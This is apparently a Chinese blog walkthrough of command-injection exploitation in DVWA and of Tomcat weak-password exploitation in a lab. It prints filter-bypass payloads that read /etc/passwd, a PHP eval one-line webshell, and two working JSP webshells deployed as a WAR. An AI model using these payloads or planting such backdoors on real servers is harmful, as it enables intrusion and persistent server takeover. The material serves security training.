0
点赞
收藏
分享

微信扫一扫

创建UI组件库后上传NPM

mm_tang 2023-07-13 阅读 71

RCE漏洞利用挖掘方法

一、从命令执行漏洞到getshell

  • SQL注入:泄露破坏数据库,数据库中可能有账号密码等敏感信息
  • 命令执行:获取目标机器命令权限,执行非法命令,破坏或控制受害机
  • 文件上传:上传后门木马到网站中,破坏网站甚至系统

在这里插入图片描述

二、命令执行漏洞详解

  • cmd1 | cmd2:无论cmd1是否执行成功,cmd2将被执行
  • cmd1 ; cmd2:无论cmd1是否执行成功,cmd2将被执行,该命令只有在Linux上可以使用
  • cmd1 & cmd2:无论cmd1是否执行成功,cmd2将被执行
  • cmd1 || cmd2:仅在cmd1执行失败时才执行cmd2
  • cmd1 && cmd2:仅在cmd1执行成功后时才执行

Linux常用命令

  • whoami 显示当前用户
  • pwd 显示当前路径
  • -ls 显示指定工作目录下的内容
  • cat 文本输出
    • cat /etc/passwd 显示/etc/passwd文件中存放的用户关键信息
    • cat /etc/passwd |wc –l 数系统账号个数
    • cat /etc/group 显示所有组文件
  • id 当前用户的uid,gid以及所在组
  • groups 当前用户所在组
  • netstat -pantu 端口信息
  • netstat -nr 路由表及网关

2.1、靶场实操—DVWA(Low级别)

  1. 源码(见DVWA里View Source):基本未进行任何过滤
  • stristr(string,search,before_search)函数:

    • stristr函数搜索字符串在另一字符串中的第一次出现,返回字符串的剩余部分(从匹配点),如果未找到所搜索的字符串,则返回FALSE。参数string规定被搜索的字符串,参数search规定要搜索的字符串(如果该参数是数字,则搜索匹配该数字对应的 ASCII 值的字符),可选参数before_true为布尔型,默认为“false” ,如果设置为 “true”,函数将返回 search 参数第一次出现之前的字符串部分。
  • php_uname(mode)函数:

    • 函数会返回运行php的操作系统的相关描述,参数mode可取值”a” (此为默认,包含序列”s n r v m”里的所有模式),”s ”(返回操作系统名称),”n”(返回主机名),” r”(返回版本名称),”v”(返回版本信息), ”m”(返回机器类型)。可以看到,服务器通过判断操作系统执行不同ping命令,但是对ip参数并未做任何的过滤,导致了严重的命令注入漏洞。
  1. 命令执行漏洞利用
  • 常用命令1:
127.0.0.1 | whoami

在这里插入图片描述

  • 常用命令2:
127.0.0.1 ; whoami

在这里插入图片描述

  • 常用命令3:
127.0.0.1 | ip add

在这里插入图片描述

  • 常用命令4:
127.0.0.1 | ifconfig

在这里插入图片描述

2.2、靶场实操—DVWA(Medium级别)

  1. 源码(见DVWA里View Source):
  • 采用了黑名单机制,过滤了“&&”与“;”(将其替换为空字符)
    在这里插入图片描述
  1. 命令执行漏洞利用
  • 只能使用“&”和“|”字符,进行拼接
  • 常用命令1:
127.0.0.1 & whoami

在这里插入图片描述

  • 常用命令2:
127.0.0.1 | whoami

在这里插入图片描述

  • 常用命令3:
127.0.0.1 | net user

在这里插入图片描述

  • 使用换行进行绕过

  • 常用命令1:

127.0.0.1&\n&cat /etc/passwd    

在这里插入图片描述

  • 使用“&&&”和“&;&”字符,进行绕过
  • 常用命令1:
127.0.0.1 &;& cat /etc/passwd

在这里插入图片描述

  • 常用命令2:
127.0.0.1 &&& cat /etc/passwd 

在这里插入图片描述

2.3、靶场实操—DVWA(High级别)

  1. 源码(见DVWA里View Source):
  • 相较于medium级别,进一步完善了黑名单
  • 过滤了’&’ ,‘;’,‘| ‘,’-’,‘$’,‘(’,‘)’,‘`’,'||'等字符
  • 其中’| '后,有空格
    在这里插入图片描述
    2.命令执行漏洞
  • 使用“&&”,“&”,“|”字符(在这些字符前后加了空格)进行漏洞利用,失败
  • “|”前后无空格
  • 常用命令1:
127.0.0.1|pwd

在这里插入图片描述

  • 常用命令2:
127.0.0.1|/?in/cat /?tc/p?sswd     #? 代表『一定有一个』任意字符,相当于寻找/bin/cat /etc/passwd

在这里插入图片描述

  • 常用命令3:
127.0.0.1|/'b'i'n'/'c'a't' /'e't'c'/'p'a's's'w'd	  #使用 ’ 连接符,要注意闭合

在这里插入图片描述

  • 常用命令4:
127.0.0.1|/b\i\n/w\h\i\c\h n\c  #使用反斜杠

在这里插入图片描述

  • 常用命令5:
127.0.0.1|''|whoami   #单引号绕过

在这里插入图片描述

  • 常用命令6:
127.0.0.1|\n|whoami  #使用回车

在这里插入图片描述

  • 常用命令7:
127.0.0.1|more /etc/passwd   #使用more代替cat

在这里插入图片描述

2.4、靶场实操—DVWA(Impossible级别)

  1. 源码(见DVWA里View Source):
  • 过滤“\”
  • 以“.”拆分,先判断是否为四段,再断每段是否都为数字,全部成立,则执行ping命令。

在这里插入图片描述

三、写入网站后门—webshell

  • WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。
  • 黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,以达到控制网站服务器的目的。

3.1、PHP一句话木马

<?php eval($_POST['cmd']);?>
#eval eval,是php的语言构造器,作用是把字符串作为PHP代码执行
#$_POST[‘cmd']以POST请求方式接收请求参数cmd

3.2、通过命令执行漏洞上传PHP一句话木马

  1. 上传到哪?
    常用命令:pwd/dir /var/www/html/vulnerabilities/exec
  2. 怎么上传?
    echo命令:echo "<?php eval(\$_POST['cmd']);?>" > 1.php
  3. 怎么访问?
    http://your_ip/vulnerabilities/exec/1.php

3.3、靶场实操—DVWA(Low等级)

1、查看路径。

127.0.0.1 | pwd

在这里插入图片描述
2、写入一句话木马。

127.0.0.1 | echo "<?php eval(\$_POST['cmd']);?>" > 1.php

3、查看是否写入成功。

127.0.0.1 | ls

在这里插入图片描述

4、访问一句话木马。
在这里插入图片描述
5、访问成功,木马可以使用。

3.4、怎么使用木马?

  • hackbar:浏览器插件,可以直接在浏览器中修改POST data
  • webshell管理器:如蚁剑、菜刀、Cknife,都可以自动连接。

3.4.1、hackbar

  • 常用命令1:
cmd=phpinfo();

在这里插入图片描述

  • 常用命令2:
cmd=system('ls');

在这里插入图片描述

  • 常用命令3:
cmd=system('whoami');

在这里插入图片描述

3.4.2、使用蚁剑

1、添加连接。
在这里插入图片描述
2、连接成功。
在这里插入图片描述

四、tomcat弱口令getshell

1、搭建tomcat漏洞靶场。

docker-compose up -d

在这里插入图片描述

2、进入靶场。

http://192.168.9.148:8080/

在这里插入图片描述

3、进入后台管理界面。

在这里插入图片描述

4、使用弱口令登录。

tomcat	/	tomcat

在这里插入图片描述

5、登录成功。

在这里插入图片描述

6、代码一:cmd.jsp (该js文件只能执行一些系统命令,然后打印相应的输出,无法进行连接,功能较弱,使用代码二可以进行蚁剑连接)。

<%
    if("thisispasswd".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;          
        byte[] b = new byte[1024];          
        out.print("<pre>");          
        while((a=in.read(b))!=-1){
            out.println(new String(b));          
        }
        out.print("</pre>");
    } 
%>
  • 代码一的执行结果(过程略):
jar cvf cmd.war cmd.jsp
http://192.168.9.148:8080/cmd/cmd.jsp?pwd=thisispasswd&cmd=ls

在这里插入图片描述

在这里插入图片描述

7、打war包。

jar cvf web.war webshell.jsp
#被打webshell.war  想要生成的war包
#web.jsp包的jsp源码
  • 代码二:webshell.jsp(过程细)
<%!
    class U extends ClassLoader{
        U(ClassLoader c){
            super(c);
        }
        public Class g(byte []b){
            return super.defineClass(b,0,b.length);
        }
    }
    public byte[] base64Decode(String str)throws Exception{
        try{
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer",String.class).invoke(clazz.newInstance(),str);
        }catch(Exception e){
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode",String.class).invoke(decoder,str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null){
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

在这里插入图片描述
在这里插入图片描述

8、上传war文件。

在这里插入图片描述

9、点击“Deploy”进行部署。

在这里插入图片描述

10、新增一个应用“web”,说明部署成功。

在这里插入图片描述

11、点击进行访问。

在这里插入图片描述

12、访问一句话木马。

在这里插入图片描述

13、使用蚁剑进行连接,连接密码:passwd。

在这里插入图片描述
在这里插入图片描述

举报

相关推荐

0 条评论